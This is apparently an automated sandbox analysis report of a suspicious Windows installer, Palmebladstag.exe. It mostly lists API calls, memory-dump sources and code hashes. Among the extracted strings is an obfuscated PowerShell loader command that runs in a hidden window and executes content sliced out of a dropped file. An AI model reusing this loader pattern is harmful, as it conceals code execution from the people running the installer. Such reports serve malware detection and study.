                                            • String ID:
                                            • API String ID: 1096422788-0
                                            • Opcode ID: 4ed2931d6e1322bdaa9ad50cb4953df85b5dadb3ad55792b24e6397abbc445e7
                                            • Instruction ID: 0f98334ba99eddbf462717ac0d7b36237a5f237946376121c7889506776d1579
                                            • Opcode Fuzzy Hash: 4ed2931d6e1322bdaa9ad50cb4953df85b5dadb3ad55792b24e6397abbc445e7
                                            • Instruction Fuzzy Hash: 31E08630E44244BADB10AFB1CD49AFD7A68AF05710F10403AF9907B0D1EAB894429B1D
                                            APIs
                                            • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: d78dfc43bad9b89d4e855ed991fe06cb02b9b17fca7f23bcc05377d0a37c9521
                                            • Instruction ID: c88b0ddfb076c9ac8c8172e2ede98752ab09736af03c38ff4908af3a3297ae85
                                            • Opcode Fuzzy Hash: d78dfc43bad9b89d4e855ed991fe06cb02b9b17fca7f23bcc05377d0a37c9521
                                            • Instruction Fuzzy Hash: 6CD01233B041149BCB00DBA89E4899D77A0DB44325F248637D111F11D1D6BD85416619
                                            APIs
                                            • SendMessageA.USER32(00010408,00000000,00000000,00000000), ref: 00403EE5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: b90161ae8cda5cbd2de65598e29a38e6d4b8b6f2e7bfd1190cff9b69a8922c47
                                            • Instruction ID: 47e4f8cec5362ef7ba492606aa4db3ba17659bb6329be143cabb9808bdc3d1f3
                                            • Opcode Fuzzy Hash: b90161ae8cda5cbd2de65598e29a38e6d4b8b6f2e7bfd1190cff9b69a8922c47
                                            • Instruction Fuzzy Hash: 03C04C716482016BEA218B519D49F177758A750701F188425B610A50D0C675E410D66D
                                            APIs
                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DFA,?), ref: 004030B2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                            • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                            • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                            • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                            APIs
                                            • SendMessageA.USER32(00000028,?,00000001,00403CED), ref: 00403ECA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 03409981cf4ee464f739a57fbc3ade95d75e68a5d1ce81eec46599a942b3d8ba
                                            • Instruction ID: 6533290ec96ace9f69d4b5d2bc7ee10b2e44395606cff802ce15a0f50474627a
                                            • Opcode Fuzzy Hash: 03409981cf4ee464f739a57fbc3ade95d75e68a5d1ce81eec46599a942b3d8ba
                                            • Instruction Fuzzy Hash: 99B01235588200BBEE224B00DD0DF457EA2F7A4701F00C024F300240F1C7B200A5DB19
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,00403C86), ref: 00403EB3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 98b266ebdf0f3c27f3687bff4252ab036e6b5e8ad03fafb5568fabfe7cf076f6
                                            • Instruction ID: 4f3b606e1f3b2692e0293683fec327d542fd6d14cd426307677a9e2f6e263f5f
                                            • Opcode Fuzzy Hash: 98b266ebdf0f3c27f3687bff4252ab036e6b5e8ad03fafb5568fabfe7cf076f6
                                            • Instruction Fuzzy Hash: F2A01231404001EBCB018B10DF05C057F21B7503007018421E1404003486310420FF1A
                                            APIs
                                            • GetDlgItem.USER32(?,000003F9), ref: 00404819
                                            • GetDlgItem.USER32(?,00000408), ref: 00404824
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 0040486E
                                            • LoadBitmapA.USER32(0000006E), ref: 00404881
                                            • SetWindowLongA.USER32(?,000000FC,00404DF8), ref: 0040489A
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048AE
                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004048C0
                                            • SendMessageA.USER32(?,00001109,00000002), ref: 004048D6
                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048E2
                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048F4
                                            • DeleteObject.GDI32(00000000), ref: 004048F7
                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404922
                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 0040492E
                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049C3
                                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049EE
                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A02
                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404A31
                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A3F
                                            • ShowWindow.USER32(?,00000005), ref: 00404A50
                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B4D
                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BB2
                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BC7
                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BEB
                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C0B
                                            • ImageList_Destroy.COMCTL32(00000000), ref: 00404C20
                                            • GlobalFree.KERNEL32(00000000), ref: 00404C30
                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CA9
                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00404D52
                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D61
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D81
                                            • ShowWindow.USER32(?,00000000), ref: 00404DCF
                                            • GetDlgItem.USER32(?,000003FE), ref: 00404DDA
                                            • ShowWindow.USER32(00000000), ref: 00404DE1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 1638840714-813528018
                                            • Opcode ID: cb469bef661858b5df0db68a836ddebc2f5500ae5cdf6e4b9af88cbbd173a5a8
                                            • Instruction ID: 73e5042133b470fdde48d750d06e43d2904589ccee469aaf4ee40575ec54014f
                                            • Opcode Fuzzy Hash: cb469bef661858b5df0db68a836ddebc2f5500ae5cdf6e4b9af88cbbd173a5a8
                                            • Instruction Fuzzy Hash: 59027FB0900209AFEB10DF54DC85AAE7BB5FB84315F10853AF610B62E1C7799E42CF58
                                            APIs
                                            • GetDlgItem.USER32(?,000003FB), ref: 00404314
                                            • SetWindowTextA.USER32(00000000,?), ref: 0040433E
                                            • SHBrowseForFolderA.SHELL32(?,0079E0D0,?), ref: 004043EF
                                            • CoTaskMemFree.OLE32(00000000), ref: 004043FA
                                            • lstrcmpiA.KERNEL32(Remove folder: ,Brandbltets Setup: Completed), ref: 0040442C
                                            • lstrcatA.KERNEL32(?,Remove folder: ), ref: 00404438
                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040444A
                                              • Part of subcall function 0040538C: GetDlgItemTextA.USER32(?,?,00000400,00404481), ref: 0040539F
                                              • Part of subcall function 00405DE2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Palmebladstag.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,76233410,0040329C), ref: 00405E3A
                                              • Part of subcall function 00405DE2: CharNextA.USER32(?,?,?,00000000), ref: 00405E47
                                              • Part of subcall function 00405DE2: CharNextA.USER32(?,"C:\Users\user\Desktop\Palmebladstag.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,76233410,0040329C), ref: 00405E4C
                                              • Part of subcall function 00405DE2: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,76233410,0040329C), ref: 00405E5C
                                            • GetDiskFreeSpaceA.KERNEL32(0079DCC8,?,?,0000040F,?,0079DCC8,0079DCC8,?,00000000,0079DCC8,?,?,000003FB,?), ref: 00404505
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404520
                                            • SetDlgItemTextA.USER32(00000000,00000400,0079DCB8), ref: 004045A6
                                            Strings
                                            • -windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne), xrefs: 004042DE
                                            • Brandbltets Setup: Completed, xrefs: 004043C2, 00404425
                                            • C:\Users\user\AppData\Local\Temp\humles\kvarterslag, xrefs: 00404415
                                            • A, xrefs: 004043E8
                                            • Remove folder: , xrefs: 00404426, 0040442B, 00404436
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                            • String ID: -windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne)$A$Brandbltets Setup: Completed$C:\Users\user\AppData\Local\Temp\humles\kvarterslag$Remove folder:
                                            • API String ID: 2246997448-3396337049
                                            • Opcode ID: 944b8319b57904c49d67891f2bdeb63af3dab2160ca5c13fdb2993793faa7d04
                                            • Instruction ID: 03cdc0df629eda19bc81850558ffdd0616f3ff49271ebeceec1b5cb03d6b2ac4
                                            • Opcode Fuzzy Hash: 944b8319b57904c49d67891f2bdeb63af3dab2160ca5c13fdb2993793faa7d04
                                            • Instruction Fuzzy Hash: DB9192B1900208BBDB11AFA1CC81AAF77B8EF85305F14447BFB01B62D1D77C9A418B69
                                            APIs
                                            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040405B
                                            • GetDlgItem.USER32(00000000,000003E8), ref: 0040406F
                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040408D
                                            • GetSysColor.USER32(?), ref: 0040409E
                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040AD
                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040BC
                                            • lstrlenA.KERNEL32(?), ref: 004040BF
                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040CE
                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040E3
                                            • GetDlgItem.USER32(?,0000040A), ref: 00404145
                                            • SendMessageA.USER32(00000000), ref: 00404148
                                            • GetDlgItem.USER32(?,000003E8), ref: 00404173
                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041B3
                                            • LoadCursorA.USER32(00000000,00007F02), ref: 004041C2
                                            • SetCursor.USER32(00000000), ref: 004041CB
                                            • ShellExecuteA.SHELL32(0000070B,open,007A16A0,00000000,00000000,00000001), ref: 004041DE
                                            • LoadCursorA.USER32(00000000,00007F00), ref: 004041EB
                                            • SetCursor.USER32(00000000), ref: 004041EE
                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040421A
                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040422E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                            • String ID: N$Remove folder: $open
                                            • API String ID: 3615053054-3278287247
                                            • Opcode ID: d629206fc8082d4d9534340c1f089e738487a858c59a90b8640b314579ac6490
                                            • Instruction ID: 031dbeac94855a04ab7bc056baf49b9f62a127ba2e136bb98bc4968a945489ce
                                            • Opcode Fuzzy Hash: d629206fc8082d4d9534340c1f089e738487a858c59a90b8640b314579ac6490
                                            • Instruction Fuzzy Hash: DF61B971A40209BFEB109F60CC45F6A3B69FB84755F10816AFB047B2D1C7B8A951CF99
                                            APIs
                                            • lstrcpyA.KERNEL32(007A0A88,NUL,?,00000000,?,00000000,?,00405A53,?,?,00000001,00405613,?,00000000,000000F1,?), ref: 004058AD
                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405A53,?,?,00000001,00405613,?,00000000,000000F1,?), ref: 004058D1
                                            • GetShortPathNameA.KERNEL32(00000000,007A0A88,00000400), ref: 004058DA
                                              • Part of subcall function 0040578A: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,0040599C,00000000,[Rename]), ref: 0040579A
                                              • Part of subcall function 0040578A: lstrlenA.KERNEL32(?,?,00000000,0040599C,00000000,[Rename]), ref: 004057CC
                                            • GetShortPathNameA.KERNEL32(?,007A0E88,00000400), ref: 004058F7
                                            • wsprintfA.USER32 ref: 00405915
                                            • GetFileSize.KERNEL32(00000000,00000000,007A0E88,C0000000,00000004,007A0E88,?,?,?,?,?), ref: 00405950
                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040595F
                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405979
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 004059A9
                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,007A0688,00000000,-0000000A,0040936C,00000000,[Rename]), ref: 004059FF
                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405A11
                                            • GlobalFree.KERNEL32(00000000), ref: 00405A18
                                            • CloseHandle.KERNEL32(00000000), ref: 00405A1F
                                              • Part of subcall function 00405825: GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\Palmebladstag.exe,80000000,00000003), ref: 00405829
                                              • Part of subcall function 00405825: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040584B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
